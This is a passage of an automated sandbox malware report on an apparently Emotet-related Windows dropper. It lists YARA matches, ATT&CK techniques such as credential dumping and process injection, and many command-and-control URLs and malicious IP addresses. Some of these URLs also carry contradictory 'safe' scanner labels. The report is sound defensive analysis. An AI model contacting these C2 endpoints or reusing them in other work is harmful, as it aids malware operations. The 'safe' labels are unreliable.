                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B8210 GetSystemTimeAsFileTime,CreateFileW,CreateFileW,GetFileInformationByHandleEx,CloseHandle,GetModuleFileNameW,0_2_000B8210
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 75A0VTo3z9.exe, type: SAMPLE
                    Source: Yara matchFile source: 1.2.wpbcreds.exe.b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.0.wpbcreds.exe.b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.75A0VTo3z9.exe.b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.75A0VTo3z9.exe.b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000000.2040983750.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.3288300959.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.2039200708.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Service Execution
                    2
                    Windows Service
                    2
                    Windows Service
                    12
                    Masquerading
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API
                    1
                    DLL Side-Loading
                    1
                    Process Injection
                    1
                    Process Injection
                    LSASS Memory11
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media11
                    Non-Standard Port
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    1
                    Hidden Files and Directories
                    Security Account Manager1
                    Process Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Obfuscated Files or Information
                    NTDS1
                    System Service Discovery
                    Distributed Component Object ModelInput Capture111
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets2
                    File and Directory Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    File Deletion
                    Cached Domain Credentials14
                    System Information Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    75A0VTo3z9.exe76%ReversingLabsWin32.Trojan.Generic
                    75A0VTo3z9.exe100%AviraTR/Dropper.Gen
                    75A0VTo3z9.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://5.196.35.138:7080/w3vsOgeeY9NPp/vwyrTa5/wI8W1JV8dTW/ZXRlXdiTaaxugNmh5/TPITs41XN0Wtx9UMJWd/VRGGqhut2ut9hId/0%Avira URL Cloudsafe
                    http://177.23.7.151/3wUCpKO4/JTPGcoppPVNecd/kZIb0JsfBL4uOV/ggtdXz/vA8qWBr8CgPGl/)0%Avira URL Cloudsafe
                    http://12.162.84.2:8080/RzqG/wshqos.dll.mui0%Avira URL Cloudsafe
                    http://177.23.7.151/3wUCpKO4/JTPGcoppPVNecd/kZIb0JsfBL4uOV/ggtdXz/vA8qWBr8CgPGl/0%Avira URL Cloudsafe
                    http://46.101.58.37:8080/Eas06APQiAXQBBRWWCh/qJFO2/PQe4JvrKGH4u/1GsN8/Z070VvHPjARxs33T/WdATQgVfQYq/s0%Avira URL Cloudsafe
                    http://192.232.229.54:7080/xbe2duP8y5opIK2l/:n0%Avira URL Cloudsafe
                    http://95.85.33.23:8080/0POplCNbRBZ4or4A/0%Avira URL Cloudsafe
                    http://1.226.84.243:8080/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/V0%Avira URL Cloudsafe
                    http://46.101.58.37:8080/Eas06APQiAXQBBRWWCh/qJFO2/PQe4JvrKGH4u/1GsN8/Z070VvHPjARxs33T/WdATQgVfQYq/0%Avira URL Cloudsafe
                    http://74.58.215.226/yhwXMM7xdxH/yuXOhXg/50%Avira URL Cloudsafe
                    http://70.32.115.157:8080/K3KZ1n42NvAQNZg4/0%Avira URL Cloudsafe
                    http://70.32.115.157:8080/K3KZ1n42NvAQNZg4/20%Avira URL Cloudsafe
                    http://74.58.215.226/yhwXMM7xdxH/yuXOhXg/t0%Avira URL Cloudsafe
                    http://95.85.33.23:8080/0POplCNbRBZ4or4A/50%Avira URL Cloudsafe
                    http://192.232.229.54:7080/xbe2duP8y5opIK2l/Z0%Avira URL Cloudsafe
                    http://1.226.84.243:8080/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/0%Avira URL Cloudsafe
                    http://111.67.12.221:8080/6o1iAIEQeDHOWcsR/$0%Avira URL Cloudsafe
                    http://1.226.84.243:8080/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/GJ0%Avira URL Cloudsafe
                    http://1.226.84.243:8080/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/070VvHPjARxs33T/WdATQgVfQYq/0%Avira URL Cloudsafe
                    http://186.70.127.199:8090/i4y5AzbH1y3/xzjeZOG1BrwFk/qPaZcSfKDwvRvJtt9i/UXLPt3ZbVkgD/0%Avira URL Cloudsafe
                    http://95.85.33.23:8080/0POplCNbRBZ4or4A/320%Avira URL Cloudsafe
                    http://12.162.84.2:8080/RzqG/hU0%Avira URL Cloudsafe
                    http://74.58.215.226/yhwXMM7xdxH/yuXOhXg//Y0%Avira URL Cloudsafe
                    http://111.67.12.221:8080/6o1iAIEQeDHOWcsR/0%Avira URL Cloudsafe
                    http://74.58.215.226/yhwXMM7xdxH/yuXOhXg//M0%Avira URL Cloudsafe
                    http://12.162.84.2:8080/RzqG/2Z0%Avira URL Cloudsafe
                    http://98.13.75.196/H9yA2oaqlws/3MmQ3/8a6D9V6hboQjs/hy9t/w9y8YK55Q41pW7E/9tuVBGyVVtFzFYd/0%Avira URL Cloudsafe
                    http://74.58.215.226/yhwXMM7xdxH/yuXOhXg/0%Avira URL Cloudsafe
                    http://12.162.84.2:8080/RzqG/0%Avira URL Cloudsafe
                    http://1.226.84.243:8080/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/w0%Avira URL Cloudsafe
                    http://192.232.229.54:7080/xbe2duP8y5opIK2l/0%Avira URL Cloudsafe
                    http://74.58.215.226/yhwXMM7xdxH/yuXOhXg//0%Avira URL Cloudsafe
                    http://70.32.115.157:8080/K3KZ1n42NvAQNZg4/ngsLMEM80%Avira URL Cloudsafe
                    http://186.70.127.199:8090/i4y5AzbH1y3/xzjeZOG1BrwFk/qPaZcSfKDwvRvJtt9i/UXLPt3ZbVkgD/A0%Avira URL Cloudsafe
                    http://98.13.75.196/H9yA2oaqlws/3MmQ3/8a6D9V6hboQjs/hy9t/w9y8YK55Q41pW7E/9tuVBGyVVtFzFYd/Z0%Avira URL Cloudsafe
                    http://5.196.35.138:7080/w3vsOgeeY9NPp/vwyrTa5/wI8W1JV8dTW/ZXRlXdiTaaxugNmh5/TPITs41XN0Wtx9UMJWd/VRG0%Avira URL Cloudsafe
                    http://12.162.84.2:8080/RzqG/70%Avira URL Cloudsafe
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://46.101.58.37:8080/Eas06APQiAXQBBRWWCh/qJFO2/PQe4JvrKGH4u/1GsN8/Z070VvHPjARxs33T/WdATQgVfQYq/true
                    • Avira URL Cloud: safe
                    unknown
                    http://5.196.35.138:7080/w3vsOgeeY9NPp/vwyrTa5/wI8W1JV8dTW/ZXRlXdiTaaxugNmh5/TPITs41XN0Wtx9UMJWd/VRGGqhut2ut9hId/true
                    • Avira URL Cloud: safe
                    unknown
                    http://177.23.7.151/3wUCpKO4/JTPGcoppPVNecd/kZIb0JsfBL4uOV/ggtdXz/vA8qWBr8CgPGl/true
                    • Avira URL Cloud: safe
                    unknown
                    http://95.85.33.23:8080/0POplCNbRBZ4or4A/true
                    • Avira URL Cloud: safe
                    unknown
                    http://70.32.115.157:8080/K3KZ1n42NvAQNZg4/true
                    • Avira URL Cloud: safe
                    unknown
                    http://1.226.84.243:8080/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/true
                    • Avira URL Cloud: safe
                    unknown
                    http://186.70.127.199:8090/i4y5AzbH1y3/xzjeZOG1BrwFk/qPaZcSfKDwvRvJtt9i/UXLPt3ZbVkgD/true
                    • Avira URL Cloud: safe
                    unknown
                    http://111.67.12.221:8080/6o1iAIEQeDHOWcsR/true
                    • Avira URL Cloud: safe
                    unknown
                    http://98.13.75.196/H9yA2oaqlws/3MmQ3/8a6D9V6hboQjs/hy9t/w9y8YK55Q41pW7E/9tuVBGyVVtFzFYd/true
                    • Avira URL Cloud: safe
                    unknown
                    http://74.58.215.226/yhwXMM7xdxH/yuXOhXg/true
                    • Avira URL Cloud: safe
                    unknown
                    http://12.162.84.2:8080/RzqG/true
                    • Avira URL Cloud: safe
                    unknown
                    http://192.232.229.54:7080/xbe2duP8y5opIK2l/true
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://177.23.7.151/3wUCpKO4/JTPGcoppPVNecd/kZIb0JsfBL4uOV/ggtdXz/vA8qWBr8CgPGl/)wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://192.232.229.54:7080/xbe2duP8y5opIK2l/:nwpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2488048416.000000000344A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://12.162.84.2:8080/RzqG/wshqos.dll.muiwpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://46.101.58.37:8080/Eas06APQiAXQBBRWWCh/qJFO2/PQe4JvrKGH4u/1GsN8/Z070VvHPjARxs33T/WdATQgVfQYq/swpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2488048416.000000000344A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://1.226.84.243:8080/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/Vwpbcreds.exe, 00000001.00000002.3288445689.00000000012AE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://74.58.215.226/yhwXMM7xdxH/yuXOhXg/5wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://74.58.215.226/yhwXMM7xdxH/yuXOhXg/twpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://70.32.115.157:8080/K3KZ1n42NvAQNZg4/2wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://111.67.12.221:8080/6o1iAIEQeDHOWcsR/$wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://192.232.229.54:7080/xbe2duP8y5opIK2l/Zwpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2488048416.000000000344A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://95.85.33.23:8080/0POplCNbRBZ4or4A/5wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://1.226.84.243:8080/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/GJwpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://1.226.84.243:8080/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/070VvHPjARxs33T/WdATQgVfQYq/wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://95.85.33.23:8080/0POplCNbRBZ4or4A/32wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2488048416.000000000344A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://12.162.84.2:8080/RzqG/hUwpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://74.58.215.226/yhwXMM7xdxH/yuXOhXg//Ywpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://12.162.84.2:8080/RzqG/2Zwpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://74.58.215.226/yhwXMM7xdxH/yuXOhXg//Mwpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://1.226.84.243:8080/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/wwpbcreds.exe, 00000001.00000002.3288445689.00000000012AE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://70.32.115.157:8080/K3KZ1n42NvAQNZg4/ngsLMEM8wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://74.58.215.226/yhwXMM7xdxH/yuXOhXg//wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://5.196.35.138:7080/w3vsOgeeY9NPp/vwyrTa5/wI8W1JV8dTW/ZXRlXdiTaaxugNmh5/TPITs41XN0Wtx9UMJWd/VRGwpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000002.3288445689.00000000012AE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://186.70.127.199:8090/i4y5AzbH1y3/xzjeZOG1BrwFk/qPaZcSfKDwvRvJtt9i/UXLPt3ZbVkgD/Awpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://98.13.75.196/H9yA2oaqlws/3MmQ3/8a6D9V6hboQjs/hy9t/w9y8YK55Q41pW7E/9tuVBGyVVtFzFYd/Zwpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://12.162.84.2:8080/RzqG/7wpbcreds.exe, 00000001.00000002.3288892180.0000000003420000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    191.182.6.118
                    unknownBrazil
                    28573CLAROSABRtrue
                    191.191.23.135
                    unknownBrazil
                    28573CLAROSABRtrue
                    94.176.234.118
                    unknownLithuania
                    62282RACKRAYUABRakrejusLTtrue
                    177.73.0.98
                    unknownBrazil
                    53184INBTelecomEIRELIBRtrue
                    70.32.84.74
                    unknownUnited States
                    398110GO-DADDY-COM-LLCUStrue
                    12.162.84.2
                    unknownUnited States
                    7018ATT-INTERNET4UStrue
                    170.81.48.2
                    unknownBrazil
                    263634TACNETTELECOMBRtrue
                    219.92.13.25
                    unknownMalaysia
                    4788TMNET-AS-APTMNetInternetServiceProviderMYtrue
                    213.197.182.158
                    unknownLithuania
                    15440BALTNETACustomersASLTtrue
                    209.236.123.42
                    unknownUnited States
                    393398ASN-DISUStrue
                    51.15.7.189
                    unknownFrance
                    12876OnlineSASFRtrue
                    51.15.7.145
                    unknownFrance
                    12876OnlineSASFRtrue
                    5.196.35.138
                    unknownFrance
                    16276OVHFRtrue
                    185.183.16.47
                    unknownSpain
                    201453AKIWIFIAKIWIFIEStrue
                    189.2.177.210
                    unknownBrazil
                    4230CLAROSABRtrue
                    51.38.124.206
                    unknownFrance
                    16276OVHFRtrue
                    200.127.14.97
                    unknownArgentina
                    10481TelecomArgentinaSAARtrue
                    64.201.88.132
                    unknownUnited States
                    21555LHTCUStrue
                    186.103.141.250
                    unknownChile
                    15311TelefonicaEmpresasCLtrue
                    50.121.220.50
                    unknownUnited States
                    5650FRONTIER-FRTRUStrue
                    181.129.96.162
                    unknownColombia
                    13489EPMTelecomunicacionesSAESPCOtrue
                    68.183.190.199
                    unknownUnited States
                    14061DIGITALOCEAN-ASNUStrue
                    50.28.51.143
                    unknownUnited States
                    32244LIQUIDWEBUStrue
                    149.202.72.142
                    unknownFrance
                    16276OVHFRtrue
                    177.144.130.105
                    unknownBrazil
                    27699TELEFONICABRASILSABRtrue
                    181.30.61.163
                    unknownArgentina
                    10318TelecomArgentinaSAARtrue
                    82.76.111.249
                    unknownRomania
                    8708RCS-RDS73-75DrStaicoviciROtrue
                    77.238.212.227
                    unknownBosnia and Herzegowina
                    42560BA-TELEMACH-ASTelemachdooSarajevoBAtrue
                    217.13.106.14
                    unknownHungary
                    12301INVITECHHUtrue
                    12.163.208.58
                    unknownUnited States
                    7018ATT-INTERNET4UStrue
                    101.187.81.254
                    unknownAustralia
                    1221ASN-TELSTRATelstraCorporationLtdAUtrue
                    62.84.75.50
                    unknownLebanon
                    42334BBP-ASLBtrue
                    37.187.161.206
                    unknownFrance
                    16276OVHFRtrue
                    202.134.4.210
                    unknownIndonesia
                    7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                    201.213.177.139
                    unknownArgentina
                    10481TelecomArgentinaSAARtrue
                    68.183.170.114
                    unknownUnited States
                    14061DIGITALOCEAN-ASNUStrue
                    177.129.17.170
                    unknownBrazil
                    262807RedfoxTelecomunicacoesLtdaBRtrue
                    85.214.26.7
                    unknownGermany
                    6724STRATOSTRATOAGDEtrue
                    1.226.84.243
                    unknownKorea Republic of
                    9277SKB-T-AS-KRSKBroadbandCoLtdKRtrue
                    51.75.33.127
                    unknownFrance
                    16276OVHFRtrue
                    137.74.106.111
                    unknownFrance
                    16276OVHFRtrue
                    46.43.2.95
                    unknownUnited Kingdom
                    35425BYTEMARK-ASGBtrue
                    172.104.169.32
                    unknownUnited States
                    63949LINODE-APLinodeLLCUStrue
                    178.250.54.208
                    unknownUnited Kingdom
                    20860IOMART-ASGBtrue
                    45.33.77.42
                    unknownUnited States
                    63949LINODE-APLinodeLLCUStrue
                    202.29.239.162
                    unknownThailand
                    4621UNINET-AS-APUNINET-THtrue
                    190.188.245.242
                    unknownArgentina
                    10481TelecomArgentinaSAARtrue
                    74.58.215.226
                    unknownCanada
                    5769VIDEOTRONCAtrue
                    87.106.46.107
                    unknownGermany
                    8560ONEANDONE-ASBrauerstrasse48DEtrue
                    104.131.41.185
                    unknownUnited States
                    14061DIGITALOCEAN-ASNUStrue
                    46.101.58.37
                    unknownNetherlands
                    14061DIGITALOCEAN-ASNUStrue
                    177.23.7.151
                    unknownBrazil
                    262886LansofNetLTDAMEBRtrue
                    95.85.33.23
                    unknownEuropean Union
                    14061DIGITALOCEAN-ASNUStrue
                    98.13.75.196
                    unknownUnited States
                    11351TWC-11351-NORTHEASTUStrue
                    105.209.235.113
                    unknownSouth Africa
                    16637MTNNS-ASZAtrue
                    216.47.196.104
                    unknownUnited States
                    12083WOW-INTERNETUStrue
                    5.189.178.202
                    unknownGermany
                    51167CONTABODEtrue
                    83.169.21.32
                    unknownGermany
                    8972GD-EMEA-DC-SXB1DEtrue
                    70.32.115.157
                    unknownUnited States
                    31815MEDIATEMPLEUStrue
                    190.115.18.139
                    unknownBelize
                    262254DDOS-GUARDCORPBZtrue
                    51.255.165.160
                    unknownFrance
                    16276OVHFRtrue
                    212.71.237.140
                    unknownUnited Kingdom
                    63949LINODE-APLinodeLLCUStrue
                    185.94.252.27
                    unknownGermany
                    197890MEGASERVERS-DEtrue
                    45.46.37.97
                    unknownUnited States
                    11351TWC-11351-NORTHEASTUStrue
                    178.211.45.66
                    unknownTurkey
                    197328INETLTDTRtrue
                    186.70.127.199
                    unknownEcuador
                    14522SatnetECtrue
                    188.135.15.49
                    unknownOman
                    50010NAWRAS-ASSultanateofOmanOMtrue
                    35.143.99.174
                    unknownUnited States
                    33363BHN-33363UStrue
                    174.118.202.24
                    unknownCanada
                    812ROGERS-COMMUNICATIONSCAtrue
                    192.241.143.52
                    unknownUnited States
                    14061DIGITALOCEAN-ASNUStrue
                    60.93.23.51
                    unknownJapan17676GIGAINFRASoftbankBBCorpJPtrue
                    128.92.203.42
                    unknownUnited States
                    20115CHARTER-20115UStrue
                    111.67.12.221
                    unknownAustralia
                    55803DIGITALPACIFIC-AUDigitalPacificPtyLtdAustraliaAUtrue
                    177.74.228.34
                    unknownBrazil
                    263652CMDNETInternetInformaticaLtdaBRtrue
                    185.94.252.12
                    unknownGermany
                    197890MEGASERVERS-DEtrue
                    24.232.228.233
                    unknownArgentina
                    10318TelecomArgentinaSAARtrue
                    138.97.60.140
                    unknownBrazil
                    264130GISTELECOMBRtrue
                    192.81.38.31
                    unknownUnited States
                    30091ACCESS-CABLEUStrue
                    192.232.229.54
                    unknownUnited States
                    46606UNIFIEDLAYER-AS-1UStrue
                    46.105.114.137
                    unknownFrance
                    16276OVHFRtrue
                    152.169.22.67
                    unknownArgentina
                    10318TelecomArgentinaSAARtrue
                    70.169.17.134
                    unknownUnited States
                    22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                    138.97.60.141
                    unknownBrazil
                    264130GISTELECOMBRtrue
                    190.24.243.186
                    unknownColombia
                    19429ETB-ColombiaCOtrue
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1553817
                    Start date and time:2024-11-11 18:18:39 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 4m 20s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:4
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:75A0VTo3z9.exe
                    renamed because original name is a hash value
                    Original Sample Name:48d8297b4a9debaa7b777f877019ce73777fbaed.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@3/0@0/84
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 11
                    • Number of non-executed functions: 11
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: 75A0VTo3z9.exe
                    No simulations
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    191.182.6.118ExeFile (378).exeGet hashmaliciousEmotetBrowse
                    • 191.182.6.118/xs8llUcr/Y4wgl/cFnl0fR87p3i2rzk/
                    191.191.23.135ExeFile (220).exeGet hashmaliciousEmotetBrowse
                      ExeFile (122).exeGet hashmaliciousEmotetBrowse
                        94.176.234.118ExeFile (278).exeGet hashmaliciousEmotetBrowse
                          ExeFile (305).exeGet hashmaliciousEmotetBrowse
                            ExeFile (323).exeGet hashmaliciousEmotetBrowse
                              ExeFile (347).exeGet hashmaliciousEmotetBrowse
                                ExeFile (349).exeGet hashmaliciousEmotetBrowse
                                  ExeFile (369).exeGet hashmaliciousEmotetBrowse
                                    ExeFile (367).exeGet hashmaliciousEmotetBrowse
                                      ExeFile (371).exeGet hashmaliciousEmotetBrowse
                                        ExeFile (378).exeGet hashmaliciousEmotetBrowse
                                          ExeFile (384).exeGet hashmaliciousEmotetBrowse
                                            177.73.0.98ExeFile (371).exeGet hashmaliciousEmotetBrowse
                                            • 177.73.0.98:443/230Ps7SLWC/UFqzM1x/o79FHp65N8VGDQmE1/5xYqSVP/UIhtJxXPjcF8jtAMQJ/
                                            ExeFile (378).exeGet hashmaliciousEmotetBrowse
                                            • 177.73.0.98:443/WKm5DxbSuUKqE021N/XHoGEy7YgNBrbtVmugc/2DUkHJHK4A7y3zcgcks/XUv7kAXZaJFB09/
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            RACKRAYUABRakrejusLTG9Z66ZF3Y370FN9E.jsGet hashmaliciousUnknownBrowse
                                            • 79.98.25.1
                                            G9Z66ZF3Y370FN9E.jsGet hashmaliciousUnknownBrowse
                                            • 79.98.25.1
                                            la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                            • 176.223.128.227
                                            ExeFile (278).exeGet hashmaliciousEmotetBrowse
                                            • 94.176.234.118
                                            ExeFile (305).exeGet hashmaliciousEmotetBrowse
                                            • 94.176.234.118
                                            ExeFile (317).exeGet hashmaliciousEmotetBrowse
                                            • 79.98.24.39
                                            ExeFile (323).exeGet hashmaliciousEmotetBrowse
                                            • 94.176.234.118
                                            ExeFile (347).exeGet hashmaliciousEmotetBrowse
                                            • 94.176.234.118
                                            ExeFile (349).exeGet hashmaliciousEmotetBrowse
                                            • 94.176.234.118
                                            ExeFile (360).exeGet hashmaliciousEmotetBrowse
                                            • 79.98.24.39
                                            CLAROSABRsora.mips.elfGet hashmaliciousMiraiBrowse
                                            • 189.60.206.40
                                            sora.sh4.elfGet hashmaliciousMiraiBrowse
                                            • 179.211.245.174
                                            5r3fqt67ew531has4231.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 189.6.48.56
                                            yakuza.i686.elfGet hashmaliciousUnknownBrowse
                                            • 186.204.239.4
                                            mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                            • 191.245.222.210
                                            wrgmhT3TP7.elfGet hashmaliciousMiraiBrowse
                                            • 189.54.255.197
                                            arm4.elfGet hashmaliciousMiraiBrowse
                                            • 177.235.51.3
                                            arm7.elfGet hashmaliciousMiraiBrowse
                                            • 191.186.71.172
                                            byte.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 187.22.156.73
                                            Josho.x86.elfGet hashmaliciousUnknownBrowse
                                            • 201.65.85.19
                                            CLAROSABRsora.mips.elfGet hashmaliciousMiraiBrowse
                                            • 189.60.206.40
                                            sora.sh4.elfGet hashmaliciousMiraiBrowse
                                            • 179.211.245.174
                                            5r3fqt67ew531has4231.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 189.6.48.56
                                            yakuza.i686.elfGet hashmaliciousUnknownBrowse
                                            • 186.204.239.4
                                            mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                            • 191.245.222.210
                                            wrgmhT3TP7.elfGet hashmaliciousMiraiBrowse
                                            • 189.54.255.197
                                            arm4.elfGet hashmaliciousMiraiBrowse
                                            • 177.235.51.3
                                            arm7.elfGet hashmaliciousMiraiBrowse
                                            • 191.186.71.172
                                            byte.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 187.22.156.73
